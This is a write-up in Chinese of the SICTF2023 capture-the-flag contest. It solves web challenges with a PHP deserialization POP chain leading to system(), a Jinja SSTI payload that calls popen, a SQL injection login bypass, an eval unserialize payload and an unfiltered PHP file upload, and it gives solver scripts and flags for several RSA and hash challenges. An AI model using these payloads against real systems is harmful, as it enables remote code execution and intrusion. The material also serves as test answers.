前言
新年前的最后一场比赛,感谢shenghuo2师傅提供的misc和密码的wp,把misc和密码ak了,太强了
web
兔年大吉
源码
<?php
highlight_file(__FILE__);
error_reporting(0);
class Happy{
private $cmd;
private $content;
public function __construct($cmd, $content)
{
$this->cmd = $cmd;
$this->content = $content;
}
public function __call($name, $arguments)
{
call_user_func($this->cmd, $this->content);
}
public function __wakeup()
{
die("Wishes can be fulfilled");
}
}
class Nevv{
private $happiness;
public function __invoke()
{
return $this->happiness->check();
}
}
class Rabbit{
private $aspiration;
public function __set($name,$val){
return $this->aspiration->family;
}
}
class Year{
public $key;
public $rabbit;
public function __construct($key)
{
$this->key = $key;
}
public function firecrackers()
{
return $this->rabbit->wish = "allkill QAQ";
}
public function __get($name)
{
$name = $this->rabbit;
$name();
}
public function __destruct()
{
if ($this->key == "happy new year") {
$this->firecrackers();
}else{
print("Welcome 2023!!!!!");
}
}
}
if (isset($_GET['pop'])) {
$a = unserialize($_GET['pop']);
}else {
echo "过新年啊~过个吉祥年~";
}
我们要利用的是__call方法的call_user_func函数,进入的话只有__wakeup()和__destruct(),如果我们执行wakeup的话就会执行die()退出了,所以从__destruct()进入,进入if语句,满足key == "happy new year"执行firecrackers(),这个方法中会给不存在的属性wish赋值,可以触发Rabbit中的__set,之后会return一个不存在的family属性,触发Year中的__get,之后会以调用方法的方式调用对象name,会触发Nevv中的invoke,之后会调用不存的方法check()触发__call,之后给cmd赋值就可以rce了
链子:__destruct()–>__set()–>__get()–>invoke()–>__call()
poc
<?php
highlight_file(__FILE__);
error_reporting(0);
class Happy{
private $cmd;
private $content;
public function __construct($cmd, $content)
{
$this->cmd = $cmd;
$this->content = $content;
}
public function __call($name, $arguments)
{
echo "到达call" ;
call_user_func($this->cmd, $this->content);
}
public function __wakeup()
{
die("Wishes can be fulfilled");
}
}
class Nevv{
public $happiness;
public function __invoke()
{
echo "到达invoke" ;
return $this->happiness->check();
}
}
class Rabbit{
public $aspiration;
public function __set($name,$val){
echo "到达set";
return $this->aspiration->family;
}
}
class Year{
public $key;
public $rabbit;
public function __construct($key)
{
$this->key = $key;
}
public function firecrackers()
{
return $this->rabbit->wish = "allkill QAQ";
}
public function __get($name)
{
$name = $this->rabbit;
echo "到达get";
$name();
}
public function __destruct()
{
if ($this->key == "happy new year") {
$this->firecrackers();
}else{
print("Welcome 2023!!!!!");
}
}
}
$a = new Year('happy new year');
$a -> rabbit = new Rabbit();
$a -> rabbit -> aspiration = new Year('1');
$a -> rabbit -> aspiration -> rabbit = new Nevv();
$a -> rabbit -> aspiration -> rabbit -> happiness =new Happy('system','ls');
echo urlencode(serialize($a));
//O%3A4%3A%22Year%22%3A2%3A%7Bs%3A3%3A%22key%22%3Bs%3A14%3A%22happy+new+year%22%3Bs%3A6%3A%22rabbit%22%3BO%3A6%3A%22Rabbit%22%3A1%3A%7Bs%3A10%3A%22aspiration%22%3BO%3A4%3A%22Year%22%3A2%3A%7Bs%3A3%3A%22key%22%3Bs%3A1%3A%221%22%3Bs%3A6%3A%22rabbit%22%3BO%3A4%3A%22Nevv%22%3A1%3A%7Bs%3A9%3A%22happiness%22%3BO%3A5%3A%22Happy%22%3A2%3A%7Bs%3A10%3A%22%00Happy%00cmd%22%3Bs%3A6%3A%22system%22%3Bs%3A14%3A%22%00Happy%00content%22%3Bs%3A2%3A%22ls%22%3B%7D%7D%7D%7D%7D
注意要把Year中的key赋值为happy new year,之后因为有私有方法private所以要url编码
ezbypass
源码
<?php
error_reporting(0);
highlight_file(__FILE__);
if (isset($_POST['code'])) {
$code = $_POST['code'];
if (strlen($code) <= 105){
if (is_string($code)) {
if (!preg_match("/[a-zA-Z0-9@#%^&*:{}\-<\?>\"|`~\\\\]/",$code)){
eval($code);
} else {
echo "Hacked!";
}
} else {
echo "You need to pass in a string";
}
} else {
echo "long?";
}
}
这题和ctfshow举办的rce大挑战基本一模一样
直接看我的这个博客就可
https://blog.csdn.net/qq_63928796/article/details/127963079?spm=1001.2014.3001.5502
SSTI
f12看到参数是SI,字典fuzz一下
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-MbSw1oU4-1674185778219)(SICTF2023 WP (1)].assets/image-20230120105850610.png)](https://img-blog.csdnimg.cn/03dea17c787c4d57900526b2f636ecb0.png)
242是被过滤掉的,经过测试
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-qr67NuUe-1674185778220)(SICTF2023 WP (1)].assets/image-20230120105827700.png)](https://img-blog.csdnimg.cn/6e56bc24d4994ba5b07d5a647dda3f4c.png)
可以通过拼接来绕过过滤,构造payload就可以
?SI={
%print(""['__cl''ass__']['__bas''es__'][0]['__subcla''sses__']()[132]['__in''it__']['__glo''bals__']['po''pen']('cat ../ga1f').read())%}
ezphp
题目是一个登录框,有sql注入,过滤了空格,select,用双写绕过
pass=1&user=-1'/**/ununionion/**/seselectlect/**/1'
成功登录admin页面
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-EU7wy75b-1674185778221)(SICTF2023 WP (1)].assets/image-20230120110715835.png)](https://img-blog.csdnimg.cn/425d7ad7037a4949a1b6ccd50c6658b8.png)
随便输一点可以看到源码
<?php
ini_set('open_basedir',".");
error_reporting(E_ALL^E_NOTICE^E_WARNING);
session_start();
if($_COOKIE['admin']!=md5('adminyyds')){
header('Location:/index.php');
exit();
}
echo('<h1>WelCome!ADMin!!!</h1>');
echo('this is a site test pages for admin! ');
if(isset($_POST['url'])){
echo file_get_contents($_POST['url']);
show_source(__FILE__);
}
else{
echo('<form action="/admin.php" method="POST">
url:<input value="" name="url" type="text">
</form>
');
}
//x9sd.php
?>
提示x9sd.php,去读取x9sd.php
post:url=x9sd.php
查看源码就可以看到x9sd.php的源码
class a {
protected $cmd;
function __destruct()
{
echo $this->cmd;
@eval($this->cmd);
}
}
if(isset($_GET['username']) && isset($_GET['unserx'])){
$var = base64_decode($_GET['unserx']);
if($_GET['username'] === "admin"){
echo "nonono?";
}
$username = urldecode($_GET['username']);
if($username === "admin"){
unserialize($var);
}
unserialize($var);
echo("success");
}else{
echo "I need some ???";
}
意思就是通过反序列化直接触发__destruct(),之后调用eval函数,进行rce,还要绕过两个简单的if语句。
poc
<?php
error_reporting(0);
highlight_file(__FILE__);
class a {
public $cmd = "system('ls')";
function __destruct()
{
echo $this->cmd;
@eval($this->cmd);
}
}
$a = new a();
echo base64_encode(serialize($a));
//TzoxOiJhIjoxOntzOjM6ImNtZCI7czoxMjoic3lzdGVtKCdscycpIjt9
再吧admin经过两次url编码后传入username
username=%25%36%31%25%36%34%25%36%64%25%36%39%25%36%65&unserx=TzoxOiJhIjoxOntzOjM6ImNtZCI7czoxMjoic3lzdGVtKCdscycpIjt9
ezupload
文件上传,给了源码
<?php
@error_reporting(0);
date_default_timezone_set('America/Los_Angeles');
highlight_file(__FILE__);
if (isset($_POST['submit'])){
$file_name = trim($_FILES['upload_file']['name']);
$black = array(".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess",".ini");
$file_ext = strrchr($file_name, '.');
$file_ext = strtolower($file_ext);
if (!in_array($file_ext, $black)){
$temp_file = $_FILES['upload_file']['tmp_name'];
$img_path = 'upload'.'/'.date("His").rand(114,514).$file_ext;
if (move_uploaded_file($temp_file, $img_path)) {
$is_upload = true;
} else {
$msg = '上传出错!';
}
}else {
$msg = '你传啥玩意??';
}
}
if($is_upload){
echo '呀,(传)进去了欸~';
}
?>
主要是这一部分
if (!in_array($file_ext, $black)){
$temp_file = $_FILES['upload_file']['tmp_name'];
$img_path = 'upload'.'/'.date("His").rand(114,514).$file_ext;
他把传入的文件放到了upload下的一个文件,而文件名是由date("His")传入的时间rand(114,514)114到514的随机数再加上文件的后缀组成的,而这个时间开头被定义成了美国时间
date_default_timezone_set('America/Los_Angeles');
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-3W7sXT23-1674185778222)(SICTF2023 WP (1)].assets/image-20230120113046929.png)](https://img-blog.csdnimg.cn/2ea0ce398f714668afb20378e439c1c4.png)
这就是时间
再看这一串过滤
$black = array(".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess",".ini");
其实并没有过滤php,所以直接上传php文件即可,之后再记住上传的美国时间,再bp中爆破rand(114,514)即可
CRYPTO
Ascii
import base64
flag = 'a$HVZDZQ@TJUMGLVHZIYUF1U0NNYDURWWDNM6FFYP1OA[TRPHWJZ7R>>>>$'
flag_ = ''
for i in flag:
flag_ += chr(ord(i)^3)
print(base64.b64decode(base64.b32decode(flag_[2:-1]).decode()).decode())
hashgame
MD5再MD5
为了只爆一次,写了个ditc
from hashlib import md5
flag_md5 = '''999a215b1f8372bb0f1c84c467a1506b
02b0b94ee1fa195ae7959560893f7e3c
297e7ca127d2eef674c119331fe30dff
65c162f7c43612ba1bdf4d0f2912bbc0
ed8a4ab0c0967b14e3bf6b145e153ec9
d24412e1ab190533176a653cef11b185
815e6212def15fe76ed27cec7a393d59
38026ed22fc1a91d92b5d2ef93540f20
cd7fd1517e323f26c6f1b0b6b96e3b3d
a94837b18f8f43f29448b40a6e7386ba
dc0ae7e1387be9b795f5d6299e383759
815e6212def15fe76ed27cec7a393d59
38026ed22fc1a91d92b5d2ef93540f20
dc0ae7e1387be9b795f5d6299e383759
a3655d5c04849a174d341b13d5cf5468
28c8edde3d61a0411511d3b1866f0636
011ecee7d295c066ae68d4396215c3d0
d7afde3e7059cd0a0fe09eec4b0008cd
39abe4bca904bca5a11121955a2996bf
a3655d5c04849a174d341b13d5cf5468
011ecee7d295c066ae68d4396215c3d0
28c8edde3d61a0411511d3b1866f0636
38026ed22fc1a91d92b5d2ef93540f20
dc0ae7e1387be9b795f5d6299e383759
a3655d5c04849a174d341b13d5cf5468
4c0d13d3ad6cc317017872e51d01b238
83be264eb452fcf0a1c322f2c7cbf987
4e44f1ac85cd60e3caa56bfd4afb675e
815e6212def15fe76ed27cec7a393d59
a3655d5c04849a174d341b13d5cf5468
28c8edde3d61a0411511d3b1866f0636
4e44f1ac85cd60e3caa56bfd4afb675e
ed108f6919ebadc8e809f8b86ef40b05
a94837b18f8f43f29448b40a6e7386ba
dcfcd07e645d245babe887e5e2daa016
665f644e43731ff9db3d341da5c827e1
83be264eb452fcf0a1c322f2c7cbf987
39abe4bca904bca5a11121955a2996bf
39abe4bca904bca5a11121955a2996bf
4c0d13d3ad6cc317017872e51d01b238
dc0ae7e1387be9b795f5d6299e383759
011ecee7d295c066ae68d4396215c3d0
5eccf232f5ebb3e780543372692fff18'''.split('\n')
import string
md5_md5 = {
}
for i in string.printable:
md5_md5.update({
md5(str(md5(i.encode("utf-8")).hexdigest()).encode("utf-8")).hexdigest() : i})
flag =""
for i in flag_md5:
flag+=md5_md5.get(i)
print(flag)
# SICTF{13578a78-1bd1-483e-8c01-4d501c8b52bb}
baby_rsa
N是234个素数的积
factordb分解一下 处理数据
import libnum
c = 44457399775772165283580795763046604956432217865936749114390645714446263790235445725770165521476841968764175721036280702731933849090719866149354613431301887740671003826556620460836983488011711209908075106260857650574672356032244606425941095128801765463716482316101398637519304864271794460829068714740938719022156283319142938782439784724450045931039355442034325311037568791297455084676548879770834712506552233840348850684727096270392080049993135041218143811167688449496243036317450681348089315258831745988434134987055263393540923865029931594717328162951158311497514418799360413513590684301435386737514918075848373373755748782672860711406169316940293554209702288482064854840802876490202123903888235028119047988176327629542924415737212649237787748145773301112682790682933658516724691338727523894513267588035437093188599375494920656327919129240066252636130803666175859640361767805549884909317548802917210333235914904622641997249853362378711924024129399688535136879208010081166848163897114124726692078532337827810846421365846926064892472698603597461932481745017020417072013702099809833423003201003030492
n = 157077292656328898849823499976497003976795705913326943955927601882559735301000546878663484930436631929909115065166613744548816622146802007640124796249330573411377703969505934904150600987843325674764620305047603408490558134670867673308099650843329640744997672015466571290660161290811275435569339606335117906571999000341133024698424364682800683662193063661214736762852739324479859236963365531207752799197178993887860855078852702337761399225640575281412171035871278933493943575572155382899938265639764715616686123949482372238288859715465115400317136714757882965887595246507450491169518000205087415380208167764110920711042584766805992237919576823121108078407699912757901788925718859790257450499775129521327827653298451904392241906547672843110356658889638496906522290674659574024024440113632175010053065452660076447040937842478007881589334096496073556056726805396937630799201696246079227214272205462258357482722478243481697053301054600954126539848778226175296162997813416634702496577009409960503948474494741296663849482119365434792563324547643352816519125305335959420429699475765642610737903235960423173
e = 0x10001
process = ['32771','33023','33071','33149','33343','33521','33863','33911','34123','34159','34231','34421','34499','34589','35089','35381','35831','35879','35969','36131','36523','36677','36871','37039','37159','37493','37691^2','37781','37951^2','37967','38219^2','38639','38821','38917^2','39019^2','39157','39343','39371','39703','39779','40087^2','40459','40471','40693','40867','41039','41161','41257','41263','41281','41387','41399','41443','41603','41771','41809','41863','41887','41941','42359','42373','42839','42899','43151','43207','43313','43391^2','43573','43613','43987','44087','44111','44207','44249','44281','44417','44491','44563','45077','45247','45281','45377','45943','45959','46147','46219','46439','46559','46853','47111','47681','47777','47857','47911','48259','48437','48479','48497','48593','48947','49103','49177','49193','49199','49363','49663','50047','50147','50261','50359','50383','50539','50833','51001','51109^2','51437','51593','51749','51787','52201','52379','52453','52769','52879','52937^2','53147','53717','53731','53917','53987','53993','54217','54311','54347','54377','54437','54469','54833','55049^2','55147^2','55249','55259','55291^2','55381','55457','55541','55661','55793','55967','56131','56149','56359','56501','56843','57037','57047','57131','57139','57413^2','57487','57571','57637^2','57803','57853','58057','58099','58147','58427','58537','58543','58679','58963','58991','59159','59333','59377','59417^2','59539','59611','59723','59743','59833','59879','59929','60029','60413','60427','60509','60679','61211','61379','61403','61781','61861','61991','62039','62297','62467','62581','62617','62683','63073','63149','63277','63331','63439','63659','63799^2','63839','63929','64217^2','64433','64679','64781','65239','65293','65497']
n_primes = []
for a in process:
if len(a)==5:
n_primes.append(int(a)-1)
else:
n_primes.append(int(a[:5])-1)
n_primes.append(int(a[:5]))
phi_n = 1
for i in n_primes:
phi_n *= i
d = libnum.invmod(e,phi_n)
m = pow(c,d,n)
print(libnum.n2s(m))
# SICTF{13578a78-1bd1-483e-8c01-4d501c8b52bb}
PolyRSA
可以知道
p = k**5 + 9*k**4 - 20*k**3 + 17*k**5 - 144*k + 47527
q = k**6 - 8*k**3 + 30*k**3 - 149*k**2 - 14*k + 39293
n = p * q
算一下可以知道
n == 18*k^11 + 9*k^10 - 20*k^9 + 396*k^8 - 2628*k^7 + 45494*k^6 + 710128*k^5 + 350749*k^4 + 281190*k^3 - 7079507*k^2 - 6323570*k + 1867478411
由于 k = getRandomNBitInteger(64)
所以 k = libnum.nroot(n//18,11)
import libnum
n = 2931835714514227696649197851452018066969814603905505893064829694548691616628661422451386639398824072768907608195113790730392677411502544741840786734616614308622423513064577929715025601090611378413475093510051291
c = 1162375069210804266034094584942794481470301602122091344590668656120128936761168164673823514232328715217241524062023457713973727518007443604233760475552174214966591823835585191443465256735930086309706593996639864
k = libnum.nroot(n//18,11)
e = 0x10001
p = k**5 + 9*k**4 - 20*k**3 + 17*k**5 - 144*k + 47527
q = k**6 - 8*k**3 + 30*k**3 - 149*k**2 - 14*k + 39293
n = p*q
phi_n = (p-1)*(q-1)
d = libnum.invmod(e,phi_n)
m = pow(c, d ,n)
print(libnum.n2s(m))
RRRSSSAAA
hint是dp泄露,先解hint
import libnum
import gmpy2
e= 65537
n= 154243858720978602820118866455277758287334223654318945323956633685668127012462551649034724900534326698546179107853501584676890290935304784613676008667655919749627682648852472398117930471389759979432279103098572267738634433626627146280660185675121614094399255782089060202532182667463993275434746386786808729553
dp= 414447829724187823397808703878958757693775250832414113550357728233230359464880433113636330432984183165483109337095394192757735932571515450285102727598243
c= 107353143319003715532284973064969905174389167949274067058206046773012002421251301189097709121034091973243342582216724329271495555062882075119176838856174054763892910473175610614629226628025470613930226188506099489500606701109022668507012376482339056160636468427364776216626364765166621843217027512464383836160
for i in range(1,65535):
p=(dp*e-1)//i+1
if n%p==0:
q=n//p
break
print(p)
print(q)
phi_n= (p-1)*(q-1)
d=gmpy2.invert(e,phi_n)
m=pow(c,d,n)
print(m)
hint=libnum.n2s(int(m)).decode()
print(hint)
得到 Alpha == 8
p = getPrime(512)
q = gen_num(p*alpha)
r = gen_num(q*alpha*2)
s = gen_num(r*alpha*4)
n = p**alpha * q**(alpha*2) * r**(alpha*4) * s**2
gen_num函数相当于nextPrime函数,所以把n中的qrs近似替换为p来表示
n = p**8 * (p*8)**(16) * ((p*8)*16)**(32) * (((p*8)*16)*32)**2
n=127314748520905380391777855525586135065716774604121015664758778084648831235208544136462336*p^58
所以p近似等于 libnum.nroot((n0//root),58)
然后求一下上一个最近的素数
def prePrime(x):
while True:
x-=1
if isPrime(x):
break
return x
p = prePrime(libnum.nroot((n0//root),58))
然后按照原方法推算,发现n正确
import gmpy2
import libnum
from Crypto.Util.number import *
def gen_num(x):
while True:
x+=1
if isPrime(x):
break
return x
def prePrime(x):
while True:
x-=1
if isPrime(x):
break
return x
n0 = 510598540378970007468346322989879190780475356832709189528874695730531468123747091318830966440138615736420891392158097533731041150162690662471483619765171875053776526546923686545162088172326434280369545887080098691661618888498451216122577703462656147845476260802989936275927468143618457014875124540773380472942489037761179303561650189545290190421786318533073909424735517884608967725919128200358535113829753453601297612782921831305721998858231417374167746154206561475003022801732102170674160043866579234096945753255309604584663823273990392197858273029361669185072049422597132579136784027822968387907216366150999438414498332890674564920800382005582891491049365978733797356415518435343495821039314228388769356638637099572998812062355774848959446125701462950655806332002764535951282449862140062574418031213788534096501985200284615865248974807525604893147298611402252296159828500266098282909607218395957805357667923653409828275804406466185333491486073920384298557332939701611488655278812282652143513835104674009767479927241052662403578967182673338296967573503287747778401579267126898937724971226916836862238412923209155792382534204896050548824028658237640251964366961727999178646613907934616655737902329568420682808750546571786374023614255135110482419627491157502417864563832543812083026753673687664854910877686333766643694031564516722983669199704788291656757271915091399977189663329054202997146978631991467923388119989473941572476162990901960011968892272676827771256008656450296183884491251752111424531449198118292179798490440493223653950102915889401116251591885909790869073018774674246846164536910633015902964911907187085243240032540938841961345835517368130042501382327926289017383981908729734129193302049155793436988510517701765733605569135643208447952662352778482137713239592896997102366230279153456455232519301534222340901671138239539845240151878610363390683459663471954623868659324304077587611084188341121303918876492043578883059738615210439439368338460631574255417822627815523601923537626576677004085017875860928802762176477815284840936951142176532768517728636562256240668409525184886142801802825451465440993457022771077957094228957592122319682216294509338262739872163482972508991702525289361105971574659126127296233247905505496525683817711366704746617027744889413904684867577081667137187623825349410229389484199608739864221035985277681307389939848405790294473878622092200837753161101695539947514614727699952200114544362051873938505591469240465379091377837297561323297393518152524513948294475770774872596601345526469590486037386767964812631618224527233850818909346007449756779707319609915127618828551910681421647307180399632857248867655836894968134457622987954781685664833951774981383914013420724637676787907498490619865488706542422141338754933476190313653530739822029700217857534243473680585150263523947891501341441371965435851479670882202992955935279933652356336270251591324623898094984119190752775236005057405257945038031382867511822173122001309505728526596893926445291712035117553637589190292816001770554129840326832888707541999454791653742647879694585329112697382151447923691770809327807665376014114552626285289291808032845544905356380497227622738746307685611140483875177839511922977657045680353723672792411661489242162646272105649970359134277499907207906149573299990033858943215801954126448693460102775418225293255402758159431943811872373682053160944887775375465971432320964554947377318554518275854303099420999992690990916801757184853847474379621177976926681977371922191722085164910430032177320954341986984523594583172470609743970245810969858512632597943721628165724329447516823159387734220282510185959768239630017162115072758419177056571781075148374822721899683720488356041096248563880547752710289151512607087038310649235610688255059182467964379544134070766646863815775576049106337955345150055151813028534690066771104188418296440067303355417210829440978858599306487361626723932883675404705319649877631289465547597225908934420304867048341698308940436377375588905463549199568800788130324653074398891097223958392703515180958466771395566567923630440881986781120062769327993137151783189811570714391264155060840731029466593405853721833971303821804104382800673631786729744779165371433211267361024896576031556979771007693215198547296582235167582106419779580693225211695215406540025468141235241168387527901851774993867055740692835931115312659500713701652905802357951993290979099170159167009106534001226859533836082801229997337966972579186548771169099646656172882424089451273021293821026173210665095782802709874946641962115525841325300318524665386511421662860490620819561338110623774842340380068922415609137358448899126553279894950604871889208579886778999174405582160576479554324208876082033912031737086248121899303730781498156597249803927142235444644481388064486155431912003641095674949903404176810866307571531389637794147871012904134653569388493652441432759092336752228939764110397029831387803943394811558386122839568158928461007578259968765727092577006588264867960486472014493774664081407186721351852883527145790575242285664659303948842228766554243966691396492391152581830022133814454196259968655735361775914705332258892954614272244452518449260489348504449204461418971768011384340273291232094176572232837038670467853897665877851434992557429017504229337778470080893449423405491607587635438331476572996201482633587271479001915768182336813417460145272910780420062773057289352127058606048428315185624554551172152106354445240590380140756355226376829443068190672329776832112173322011137862590548721676059398379694994522794474774534579546109677615257696703950497332824299576069196330271666459758430542051969093680846765661685489556479825015505460585577388300005030240514448617715276600874290664416888184557142542207029827016362686924883704397874129412267949416733492080843315519912943048041880665442664534980370689081266908497051077237188221752059058912835617635691061804481035908317765279937217591432632832678806430381325340000898958680468694182993189208039459712391492410123386884340504648296815916980264240229859574883155040793388439699245314010536014311134726579595932201351264754211113984594974123575279085420654342347792446273359397655783349850267895960713020361459104930811498666622216299579774939159380045958811891996366190154624989040001455252320159516822116133341010157165599727635333348456688307169980804760876207246783116588952529877373514768545007418968307885769960168050996962066803264260375707466369627458024513973771207018864983698407016663019106354023164759250846073414341438963394719456500998324900154652118420207057668806120330181700845296117532235012372135050553397046174401449323031309344766628888675704109715329046692002106076405553528413866402862565543443907259825033515101841485790388106868972724754988229771779715569516295419556055234476868558577442887306482605945053829666543946452255290321024138948999088611233226734197091325915223296133751626031378197131875533631358612215053149934608672729194446883476706267066475008836864936670808320239466055935088929279252129128009704233352664523535820092988950793050907265677092793104426094212209504897403359406325045852228354350509453013015487815230129380079713113632363881496974185547766115624580099624722897692297760495094913178120692467666707678647081180656345151015995338390986674404981831649353833607305738823436744297628382797810952028446046016233612873716789383675779820186248250486000672269630344269347652027789034023080859790238772676504723029078903218723114249502157501775936110552413022658586833869562215506206204712447588632398550497708640229614956652263449460598992811393334042395804931240940416629178335447861485028284981615219874331354750385150254017244750993573994159458909546341067039268159319391512934162794663414200907868505060542602841564239761181077333990423542820064315891665379550720216448942932714180923613869070005330476506812100063599659432570925437054287120906048730323556681557905787470647037629769660028387819741611799183349496549168370221978146678987457271259655273299546276899538032070218474555442304430064164467753804089753466882786069297036926063093020795423414152340563079346797084488827259011515774643776620378827875819192074121522712821147817374988804339999134520633699074448564057555026364304855373068414955699295158212425760345481057281658337956841137897162198027254556350868502178340964817530029135654659162400076087528650997151875596189190736466304722028587441680622878918057024286243448077104494316372739218635221411755498456912672491099154558604384574583302548226057069534004474532514444674565766058970748694657151540644416463532338966570743112669782840065402131461088637463019996192189423665651801811614499041923273110971446683450048861113332787126098622974613883291506736280588039145040361795192519576202306796277888696719887642051327259799873478040156450250036778305950744573270786882726162630115640020293415918210448873867037875790399234972055537649774407094382744621251926131880807765203843946682834221238903263352845265134368550124026502981782369374484091775137498831749984649699756860976525160646445060537001
c = 25311588269686177955448734593829241225577179988164713941852977611031657483354358211703127234256857543045931490595235462694154500286504335321863566904591526587164297277540588019404183750093303030110155964308233155625979213391426577001127732161793532171930032372311485789800839135378584125843945003217786635500780784536181313697728354510921343049319891609423580951127082479154042124088536642353812516362473763243425336498681024731131013712158320926550826023277898283823992258572884077276506953901984370413493389421701244517177275694290580595883324705204426546600360091062972293159479880268240701929584137714053692704173792703744319619320692061092061615202753943135058204637610994232168818081462863915909261100211958674543647005416235222620606212841753586419836448681445654681389951211124603287962397164672343026391101395393442103086256726266031275710666309840451443110824175976964355109239201609721120961810198879456321855222352235065257082872600438604687617267718725588993464084147695037610145634237788526691386358596867368523164061114195245860062033244276270480267737617206612775486335779851309426638789250166900931784751600508190450785806340839297468432626354823268011108399699249876358363866293469899572158837757748629586492339783888456600259136387616777593894789302431752391447333278000811521062096467397501227651566498970779080811188805992370970942403208432494393387894197176720244315639559895616799551357601688597541585709039366190088117378880414928532937085490713336140523926983900188378021593225550131993528275166272215028510435690944582596557549068715312515919059333916941744937308255671959764859162487792658274812322891679161915480098864709106347357292015949882243095564999283630289876842913558415205967734452657944991350268108202225952952066459093168792825684626405271617613362070897142103054139806566495183172335794957308822648116537830567396971238329939142829563169355194093529211071160078683833491919940022871862059981346961003867620542620578917684687869682550269127226291011607064545739386850054846167307744022708831833252517778607796258598290908139274345221343651583618249287308738279011682960787460189183445095638164116734700624496711487227176740828397696295620232796356005136058517828311139839381424066302086111930635998143063033446131859852797958765199173807715541045956108285596958780742834805533223538366354327087736088500599094358107164689423572964793385788194218918919596478862097292477628426360333874314260108133339375942666508606311391805252966277961758108821946154428477616100004321457604879220523742427633323872953699931521980332026241531049474031438142792394628576016121322036294740176980189940853036679375845577017978783071015970829136676221389585848058189544793760570196797629432282672371000290840492119720433350192833648839794730598188620374416865232426658538841900897108162173580739323675324880778494924038982358349531848197090990541020708295116156624389135273650491811601011636903928586011504526431498652011548693157985029456398851189821020778958527809174433156243544030624341915713810661287037659586018768085470670240790942171506843637271442721823608266490364627429331023698199955218456371716269004979764982383921294842864121196124699402037204598504310969390789092001114319822852242500941141355281693725110460506548426263105213498404197519606615831672853931646583757742145492562101250546593997874586076926641241047317510838024042147508770595175718146175716833867781581245298658392175502069483979736336330731124942036757071709086638075284655589787868565023763734664219353940143820183318534640360506287779208468427268377183973501528333749816003855834863565394122448191029578528511650194632623989208637401008114422451686312319644054514944700566430912835340518601698767128195833704182657730566589247891277627101027106635732998136735398078858899384713118593668984773592904704131402905145754570091966901120411201405256435232063295790833161132002246279663161388421997242226907126829858922174709653627696146355472690262198127338971112610753839661677080463775112411884196230185877234066728564716929551607129141735155379529048300204700285511666205204686244751557147684338591300111406075976759988295937870045743031816067994768915303111125253664865369863586807234945352445045026501495849671447691502253489642657652848949102823407762108943161789244134119866441040670840037015617307056821150285453994199024947457774647253618512995677313792036106100497936654142008173389260345411854520383366800831542339243757421033121103167943520915885043698882609693007629591093225819727653240183003450339802857059736870645197609170799838610316307123146927966669912638227587517396282910946355194781275415343491170583392480153599086125374051844306869510079152461763122622668280249192047024784624692776244265874153473114993619019113474166958126841368545758693832786756946298833891033171752534079387364641021835311861509609494125593285947444939996542402774020507531158198766149282993994638607458820211163623309687149807339960007614766879688676462400606899851539023671152038536934433128973358637812907001112093086713949701646964777013925616637956114825918525229968119306607256312727518429074253193934915609865400118400124334806320033990630595454381780378123232633134565408152216410478497582716891919477755736223636583493709691482948793995974775520709337409910573358960632077245564017495103173982250506224927848890977671698731337737945862469303397352291579706358090437359126171980555387033997507170208063868788685780633727495158542911276981383764698030088894904043298340184342818716278091407356551940358010532738356144600648671870141201656260882560550096111259047730234565173017875969390130055742832375612379167064701421263006004472414998830886590121784525812803198481744263349186310137594023961272959521982892804372412802448375074058059953851751721276448647238818757245128139844126234490887064897176175605991477364838775902549049484485649550475857257115219540606931472558004890564503134870490140656624241401747198540715275804941032074573356860460172868340373583692584902872979221114982298050586685719887060873413850621645519128954022253850929825608263273096476942591333367968509790925478388960974334157155990587259664085903377635645971389261554405014491809856113962072321115329323751880850245450855429733690986687462514539793256111238991830404264833945950057548041347552265351912075406068254301589527368376552057750656888595867048015012255350060023438752477068307445956245683183096512267217891149812719686622381240260466772552889788641876064057960173837664029586196731436456574414559972320705400861271592462379875676277251086312872195716024719468847393778892154498344296554136868868732950910162390521996660833516010868267341539744299603050842530651780425947531816479566426165422123252285427076862067553260240357395991463485011778125635347076641337205162163658915958257879189951068432591492287483129944125287963913713736174143726754563437013760958618334477377727596918588685928884428267449422751775309153821164066157157127578931430789782791432466972743083256930846560916380022935439074194208587413499830348721004306047843916090382879427208653946874404416581482497419737465638158237340330822703573665318917667360471294611610224794247546701801044290825387969994925735165223021550294577211312086169077389985367351707099712483698243658870007261177946508698830792080087400145468466457013023648585707831661968993789151545051681008263293021078693138432668411562842904645661356499891588207831214182852485507569391094080770281546830762172075737108196782354642073491890672014845707320966391491467609280627047834838773416130380735074488364271149543425149101272213833983451690912775914099688310078028317868139895586469648241691434390559738020665790535748911667198341478329818172050103593169144077713081858968945277802911631514524770516773987691162846774892828407010262766598402873965272708201519043339930474621748065360132998861911090097210247744181877811558047691563490093112810880988416880859363631693862441291401344868362517958157134815632633152101164792211199872770004214575342556751954753067436057216989105115974894826691301734658752554796336087163153087013755182247902851847839867807219615044427616326518986674768302109569955218389569458769985874451273117138435546665024826358058600551523916808015505037962468350942106702503883112975634757971636535249998962164886704286732345711210362931312187319836001555348202695806282730945501510756659164231139623277954192087899140537284122009070763979073048837471984618684020674370221463294306239424220412900401460550783283591789801735401367473630854684306273273881688896021682911944793729874921181848098382943970467341811398482121657330781393699096796050290808604481724879698091852697163383826854575487201365106673196811573729247280577781500366763330567122007588833805912087009446499739562463428568952248234506507069953596589309728265145195922268165106056450388840269349409588020300011340940321969965833519126936472969929255823540027083032424724503173052044192907375974391257436211908641463947719594493311129179150043015816776680636855703407557636501711566215605658114055289137679940955
